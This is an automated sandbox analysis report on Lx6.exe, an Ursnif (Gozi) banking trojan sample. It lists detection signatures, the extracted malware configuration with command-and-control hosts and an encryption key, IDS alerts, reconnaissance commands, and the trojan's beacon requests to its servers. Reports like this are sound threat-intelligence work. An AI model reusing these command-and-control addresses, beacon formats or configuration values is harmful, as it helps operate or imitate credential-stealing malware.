Windows Analysis Report
Lx6.exe

Overview

General Information

Sample Name: Lx6.exe
Analysis ID: 720586
MD5: 3b892bea0f8cbe0b61ee380743567d1d
SHA1: 90522132e3a97e966e5270a8e105cc33f0d6c4e5
SHA256: 6b722961edc010c5487de4ef7eee84b586ac3c3f06dbd1920935ea5f7bb90543
Tags: 185212471331947622560912135074exeGoziOpendirtel12-msn-com
Infos:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Dot net compiler compiles file from suspicious location
Antivirus / Scanner detection for submitted sample
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Uses nslookup.exe to query domains
Writes or reads registry keys via WMI
Uses net.exe to modify the status of services
Machine Learning detection for sample
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Self deletion via cmd or bat file
Changes memory attributes in foreign processes to executable or writable
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Performs a network lookup / discovery via net view
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
Drops certificate files (DER)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Too many similar processes found
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Uses reg.exe to modify the Windows registry
Queries the current domain controller via net
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Sample file is different than original file name gathered from version info
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: Lx6.exe ReversingLabs: Detection: 66%
Source: Lx6.exe Virustotal: Detection: 63% Perma Link
Antivirus / Scanner detection for submitted sample
Source: Lx6.exe Avira: detected
Machine Learning detection for sample
Source: Lx6.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.0.Lx6.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen7
Source: 0.2.Lx6.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen7
Source: Lx6.exe Malware Configuration Extractor: Ursnif {"RSA Public Key": "t3qotb1uLz0WQBQfwLqib6qEJZE+UWboYbVA8D0wT+tWlc5qtQDeaqzOC2nQDK16TGqueaW5oGs4CGiO/MdFt2KusjJx8+1kpFAzW86uZJOIIf4iTEkhS3MyiIa/Q7lcVfHfnxpB+UbYYggJs5GX2bL7AmnKln9+gOVwUuO7JAeDw+DtYHnZsQ5QWiILRjbhzgULABNMELryH3vhxO50soxjs3xWLliZ7NkotkIovW5lDNqd0O2XXyoOurxXjuZGPEbbhRZBpHdWEhqREXH1enS9abglL6UWQWXDddw6a+cdOzlsIkv4dFlHNnlldLue5uJRFh2QmHZUYokW7tGSKTbEnFyrm9DfIThSGsj+rn4=", "c2_domain": ["tel12.msn.com", "194.76.225.60", "185.212.47.133"], "botnet": "1900", "server": "50", "serpent_key": "0FL5S9PzrGv40a6p", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
Uses 32bit PE files
Source: Lx6.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: .C:\Users\user\AppData\Local\Temp\iyr5jfx4.pdb source: powershell.exe, 00000004.00000002.797557745.0000021F39EFC000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: Lx6.exe, 00000000.00000003.448194501.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\jxpjpfgv.pdbXP"x source: powershell.exe, 00000004.00000002.798921671.0000021F39F62000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: Lx6.exe, 00000000.00000003.448194501.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\jxpjpfgv.pdb source: powershell.exe, 00000004.00000002.798534347.0000021F39F41000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\jxpjpfgv.pdbr|* source: powershell.exe, 00000004.00000003.449394272.0000021F4DAA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\iyr5jfx4.pdbXP"x source: powershell.exe, 00000004.00000002.798092069.0000021F39F20000.00000004.00000800.00020000.00000000.sdmp

Spreading
barindex
Performs a network lookup / discovery via net view
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00768664 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_00768664
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00752299 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_00752299
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00761577 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_00761577
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0075154D FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 0_2_0075154D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_03022299 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 35_2_03022299
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_0302154D FindFirstFileW,FindNextFileW,FindClose,FreeLibrary, 35_2_0302154D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_03031577 memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose, 35_2_03031577

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: apnfy.msn.com
Source: C:\Windows\explorer.exe Domain query: www.msn.com
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49698 -> 52.169.118.173:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49698 -> 52.169.118.173:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49700 -> 194.76.225.60:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49700 -> 194.76.225.60:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49701 -> 52.169.118.173:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49703 -> 194.76.225.61:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49703 -> 194.76.225.61:80
Source: Traffic Snort IDS: 2021814 ET TROJAN Ursnif Variant CnC Beacon 3 192.168.2.4:49703 -> 194.76.225.61:80
Uses nslookup.exe to query domains
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /doorway/j2Kh1F01rzc/C8YfqfqOL0fd_2/Faja_2BeyQazoCIhY8EM9/jtWW9dUBZLJi2O8c/5bSyBdVOxMEWaUX/ShuObsG4WHyjfvJOvS/7Etsx6H8b/xJ9ufj3B90qCwQfbGxOr/E6EEqhpsHuAJvMjEWxJ/bbt9tD_2FAMRZ0X6mUy9CA/ykkOKoxULnECB/ejdchRP6/xdR6yPCPWIpLVR5uBosZgJc/ZByIsZgREK/Fk_2Feeg2_2Bk9KT9/iLNnOQl_2B8z/5ltZk0GHQaA/kR9XvP8sc8BQlA/LXFn1z6p/VlTMdML3/9.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.225.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /doorway/BIhFC1DHq0NxSqN_2Fq5v/hicggKY4SgwJPP6D/F4xxZuIhTddt0HO/A_2B6u1ukXktqk9I1N/03tCA2eZF/F2lX7Km3UL6Oc40qXR7I/S_2Bu_2F1gAnwxNSHl_/2B_2BIw1VXdQgjLWDGSvzH/6KsVMipemRsxc/s39L4jXr/llySx2Z4YWz6hWH3fehvPN_/2B4i_2B9D9/MRxPcto8_2FTKi6Ul/Lo0znElngJCM/KVK8xvLBVm9/FogU94tV1Oz3NS/xOy9YP2f0yNELqTpaSapG/CGthTWmcja_2By_2/BWnMuFbG2_2/FigtxC.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.225.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /doorway/yww9t6EI6u3knXcyyJCm/k0PaEmMkYIgXI64U0Xz/raOOkTYJ1OffkP1wEWgVkk/KDIFR_2BFO6sY/C2PaBaPa/Sss01ix_2BadgeHfS9wHDYB/Y8ru3rQs3i/_2BVL_2F9XZIKlCI8/B1oNU6QkNaWX/PsYuvkPEO_2/F4YFTJXJbymKQ2/fHoiICtdHiiOAaF3y2_2B/YuR2etKSof76kp2a/rN6zIbIDcAsv1vB/ZbVJT7_2F5CmNDvPiV/bnGga5QOC/6JDIjD6kBTEGU_2FDRCY/QI5i_2BmMOmGPPVMPTI/LhHL9V2_2/Bt.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.225.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /doorway/yww9t6EI6u3knXcyyJCm/k0PaEmMkYIgXI64U0Xz/raOOkTYJ1OffkP1wEWgVkk/KDIFR_2BFO6sY/C2PaBaPa/Sss01ix_2BadgeHfS9wHDYB/Y8ru3rQs3i/_2BVL_2F9XZIKlCI8/B1oNU6QkNaWX/PsYuvkPEO_2/F4YFTJXJbymKQ2/fHoiICtdHiiOAaF3y2_2B/YuR2etKSof76kp2a/rN6zIbIDcAsv1vB/ZbVJT7_2F5CmNDvPiV/bnGga5QOC/6JDIjD6kBTEGU_2FDRCY/QI5i_2BmMOmGPPVMPTI/LhHL9V2_2/Bt.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.225.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.msn.com
Source: global traffic HTTP traffic detected: GET /de-ch/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.msn.comCookie: PreferencesMsn=eyJIb21lUGFnZSI6eyJTdHJpcGVzIjpbXSwiTWVTdHJpcGVNb2R1bGVzIjpbXSwiTWFya2V0Q29uZmlndXJhdGlvbiI6eyJNYXJrZXQiOiJkZS1jaCIsIlN1cHByZXNzUHJvbXB0IjpmYWxzZSwiUHJlZmVycmVkTGFuZ3VhZ2VDb2RlIjoiZGUtZGUiLCJDb3VudHJ5Q29kZSI6IkNIIn19LCJFeHBpcnlUaW1lIjo2MzgzMjYyNjI0NTk3NzIzMjYsIlZlcnNpb24iOjF90; marketPref=de-ch
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.msn.comCookie: PreferencesMsn=eyJFeHBpcnlUaW1lIjo2MzgzMjYyNjI0NjE0OTA5OTMsIlZlcnNpb24iOjF90; marketPref=de-ch
Source: global traffic HTTP traffic detected: GET /de-ch/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.msn.comCookie: PreferencesMsn=eyJIb21lUGFnZSI6eyJTdHJpcGVzIjpbXSwiTWVTdHJpcGVNb2R1bGVzIjpbXSwiTWFya2V0Q29uZmlndXJhdGlvbiI6eyJNYXJrZXQiOiJkZS1jaCIsIlN1cHByZXNzUHJvbXB0IjpmYWxzZSwiUHJlZmVycmVkTGFuZ3VhZ2VDb2RlIjoiZGUtZGUiLCJDb3VudHJ5Q29kZSI6IkNIIn19LCJFeHBpcnlUaW1lIjo2MzgzMjYyNjI2MjMzNjk0MDQsIlZlcnNpb24iOjF90; marketPref=de-ch
Source: global traffic HTTP traffic detected: GET /doorway/uRv392Rtz866/nti_2ByAL1r/R8CkJ_2BndSyRx/sIG44fcYL4SmExCi0ACI7/oER1nF0Bt2Tpxtf8/pvf2xzyDmqE4uH6/atElJIeiaCGvRyaYTW/O_2Bb7sZx/7GOqqpJyOKdZvhgFoplL/gFpgB_2BgQj834VvyfM/T9x1pruFqGyVhzjoXgN9Yh/z5CHc_2FavqJW/MXQOJsyO/VzU5_2FcjvOlXkGZhClQ7RM/oSy78PufE2/FJvd3_2FTRM8OrG4Y/ryVNLZn8s_2B/KVoRzz7Jpgf/a.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 194.76.225.61Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /doorway/bRzGSLjweAbH/PVfy51BTQqO/lWZDAcFYwrYEOw/P1069Ds4xjESTY05mmd1_/2ByVzroc4cimG4A8/PzkyhLRGCX0aFw5/Jtve4MdzfQJPkPgA2k/NTDeHmvoJ/_2B7yHjl7zuPv_2Brki5/vNALnLBqmQChxlgwPJX/YMRMYrIxai4T4_2BKHDViB/Hv_2BBzVFkjNS/FgarEETc/294Vv6pgzz58Ssm8O4z7jEg/g3Dq3u6_2B/toSBBRie0B5BZcweG/l7bNSU7DgvscLKrC/Sp3p.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 194.76.225.61Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /doorway/b6wMkPt4iWosnbXK8RWvn/wQ2bkOJqcdbdcNhg/tg0Z3ks_2FXcWvb/njy6I8DMVjfhayfvGk/AHmjUevns/VlDNJo0_2B7BLsOhWepg/SFW_2F2h4VyZK2j7bvO/pwSb1f2R_2B4_2FNz_2Fk5/AtvhdDlWA69Wm/XRrBsoYg/JvQOOWqnl_2BSVvJf6ZjHAL/wi1PXKezi1/T9UASDBDRIpvMBY_2/FoQu0ao4VHCM/ZdN_2Bl0_2B/R_2BeX3PT9oLhg/3PUDsQH9gNCwUAZWN3W4_/2BLY_2F_2F1_2F3U/UklFvieJ/d91ke0Bg/KsQU9iQ.drr HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 194.76.225.61Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /doorway/8DqiRUYpN1g/urg4gk8belU2Hp/6R_2FaNTBZnVkLTOVWhaX/cRir_2FDANkaaRhV/ClRbP8o7eYAfvcj/15sk13GdbMsMo5M_2F/JnE3OOrX1/Yn3LiAEserhxrqJvZEPb/e6YS2cNRsGxIjllZdqY/7_2FRYI58Sw6j4ExBQcowc/5qMbTW7lnZmjK/j8COe_2F/4naQldFBQDlP42ux0j7rpPZ/VYnkJGg8xi/iWRQWDs2GHiDVoqIT/U1cLh8zIJ54C/3jdFHxCPndA/7QWrJ8HiTz2ZrO/n84c0VWLTOO/rD8u.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 194.76.225.61Content-Length: 54Connection: Keep-AliveCache-Control: no-cacheData Raw: 31 31 2d 31 30 2d 32 30 32 32 20 31 35 3a 30 34 3a 32 35 20 7c 20 22 30 78 61 61 61 34 39 34 65 37 5f 36 33 31 34 63 64 34 36 63 34 66 66 35 22 20 7c 20 30 0d 0a Data Ascii: 11-10-2022 15:04:25 | "0xaaa494e7_6314cd46c4ff5" | 0
Source: Lx6.exe, 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, Lx6.exe, 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: Lx6.exe, 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, Lx6.exe, 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: RuntimeBroker.exe, 00000013.00000002.860670049.000002240CD05000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.858831162.000001D023E05000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001F.00000002.856155256.000001489B505000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.856115183.00000191D3AAF000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000043.00000002.778448031.000001FA9DC8D000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000059.00000002.827104369.000001AF8BB9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://curlmyip.net
Source: powershell.exe, 0000002D.00000002.856115183.00000191D3AAF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://curlmyip.net1g
Source: RuntimeBroker.exe, 00000013.00000002.860670049.000002240CD05000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.858831162.000001D023E05000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001F.00000002.856155256.000001489B505000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000043.00000002.778448031.000001FA9DC8D000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000059.00000002.827104369.000001AF8BB9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://curlmyip.net1g71lXXnduT6klnGfile://c:
Source: Lx6.exe, 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, Lx6.exe, 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: cvtres.exe, 00000059.00000002.827104369.000001AF8BB9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ipinfo.io/ip
Source: RuntimeBroker.exe, 0000001B.00000000.629410549.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.609610192.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.634295929.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.854225233.000001D021902000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ns.adobe.cmg
Source: RuntimeBroker.exe, 0000001B.00000000.629410549.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.609610192.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.634295929.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.854225233.000001D021902000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ns.adobe.ux
Source: RuntimeBroker.exe, 0000001B.00000000.629410549.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.609610192.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.634295929.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.854225233.000001D021902000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ns.adobp/E
Source: RuntimeBroker.exe, 0000001B.00000000.629410549.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.609610192.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.634295929.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.854225233.000001D021902000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ns.micro/1
Source: powershell.exe, 00000004.00000002.800187372.0000021F455E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ogp.me/ns#
Source: Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ogp.me/ns/fb#
Source: powershell.exe, 00000004.00000002.561587239.0000021F35781000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
